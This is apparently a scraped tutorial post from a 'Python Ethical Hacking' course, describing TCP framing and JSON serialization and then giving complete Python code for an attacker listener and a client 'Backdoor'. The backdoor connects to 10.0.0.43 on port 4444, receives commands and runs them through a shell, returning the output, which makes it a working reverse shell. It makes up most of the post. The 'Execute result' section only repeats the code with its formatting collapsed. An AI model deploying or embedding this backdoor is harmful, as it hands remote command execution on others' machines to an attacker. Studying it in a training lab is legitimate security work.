zoukankan      html  css  js  c++  java
  • Python Ethical Hacking

    BACKDOORS Sockets

    Problem:

    • TCP is stream-based.
    • Difficult to identify the end of message/batch.

    Solution:

    • Make sure the message is well defined.
    • Implement a protocol that sends and receives methods conform to.
      • Send the size of the message as a header.
      • Append an end-of-message mark to the end of each message.
      • Serialize the message.

    BACKDOORS Serialization

    Benefits:

    • Message is well defined, receiver knows if message is incomplete.
    • Can be used to transfer objects(lists, dicts ...etc)

    Implementation:

    • JSON and Pickle are common solutions.
    • JSON(Javascript Object Notation) is implemented in many programming languages.
    • Represents objects as text.
    • Widely used when transferring data between clients and servers.

     Server Side - Listener Code:

    #!/usr/bin/env python
    import socket
    import json
    
    
    class Listener:
        def __init__(self, ip, port):
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((ip, port))
            listener.listen(0)
            print("[+] Waiting for incoming connections")
            self.connection, address = listener.accept()
            print("[+] Got a connection from " + str(address))
    
        def reliable_send(self, data):
            json_data = json.dumps(data).encode()
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024).decode()
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_remotely(self, command):
            self.reliable_send(command.decode())
            return self.reliable_receive()
    
        def run(self):
            while True:
                command = input(">> ").encode()
                result = self.execute_remotely(command)
                print(result)
    
    
    my_listener = Listener("10.0.0.43", 4444)
    my_listener.run()

    Client Side - Backdoor code:

    #!/usr/bin/env python
    import json
    import socket
    import subprocess
    
    
    class Backdoor:
        def __init__(self, ip, port):
            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.connection.connect((ip, port))
    
        def reliable_send(self, data):
            json_data = json.dumps(data).encode()
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024).decode()
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def execute_system_command(self, command):
            return subprocess.check_output(command, shell=True)
    
        def run(self):
            while True:
                command = self.reliable_receive()
                command_result = self.execute_system_command(command)
                self.reliable_send(command_result.decode())
            connection.close()
    
    
    my_backdoor = Backdoor("10.0.0.43", 4444)
    my_backdoor.run()

    Execute result:

    #!/usr/bin/env pythonimport jsonimport socketimport subprocess

    class Backdoor:    def __init__(self, ip, port):        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.connection.connect((ip, port))
        def reliable_send(self, data):        json_data = json.dumps(data).encode()        self.connection.send(json_data)
        def reliable_receive(self):        json_data = ""        while True:            try:                json_data = json_data + self.connection.recv(1024).decode()                return json.loads(json_data)            except ValueError:                continue
        def execute_system_command(self, command):        return subprocess.check_output(command, shell=True)
        def run(self):        while True:            command = self.reliable_receive()            command_result = self.execute_system_command(command)            self.reliable_send(command_result.decode())        connection.close()

    my_backdoor = Backdoor("10.0.0.43", 4444)my_backdoor.run()

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    105个软件测试工具大放送
    2016年开源巨献:来自百度的71款开源项目
    开源代码:Http请求封装类库HttpLib介绍、使用说明
    C#的HTTP开发包 HttpLib
    dropzonejs中文翻译手册 DropzoneJS是一个提供文件拖拽上传并且提供图片预览的开源类库.
    Windows平台分布式架构实践
    Windows平台下利用APM来做负载均衡方案
    C# .net dotnet属性定义属性,以提供显示明称,默认值
    细说ASP.NET Forms身份认证
    IIS 7.5 Application Warm-Up Module
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11628693.html
Copyright © 2011-2022 走看看